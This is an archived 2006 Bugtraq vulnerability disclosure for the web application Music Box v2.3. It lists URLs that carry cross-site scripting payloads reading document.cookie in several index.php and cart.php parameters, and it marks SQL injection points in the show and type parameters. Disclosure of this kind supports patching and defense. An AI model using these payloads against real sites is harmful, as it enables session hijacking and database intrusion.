XSS & SQL Injection in Music Box v2.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS & SQL Injection in Music Box v2.3
From: xx_hack_xx_2004@xxxxxxxxxxx
Date: 24 Mar 2006 21:43:12 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com

Exploit :
XSS :
http://example.com/music/index.php?id='><script>alert(document.cookie)</script>

http://example.com/music/index.php?action=top&show=5&type='><script>alert(document.cookie)</script>

http://example.com/music/index.php?action=top&show='><script>alert(document.cookie)</script>&type=Artists

http://example.com/music/cart/cart.php?message1='><script>alert(document.cookie)</script>

http://example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script>

SQL :
http://example.com/music/index.php?action=top&show=5&type=[SQL]

http://example.com/music/index.php?action=top&show=[SQL]&type=Artists


Discovery by Linux_Drox

http://www.lezr.com

Best Regards ,,

Prev by Date: [DDSi-SA] XSS in Raindance Communications Web Conferencing Pro
Next by Date: Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
Previous by thread: [DDSi-SA] XSS in Raindance Communications Web Conferencing Pro
Next by thread: TSRT-06-01: Symantec VERITAS NetBackup vnetd Buffer Overflow Vulnerability
Index(es):
- Date
- Thread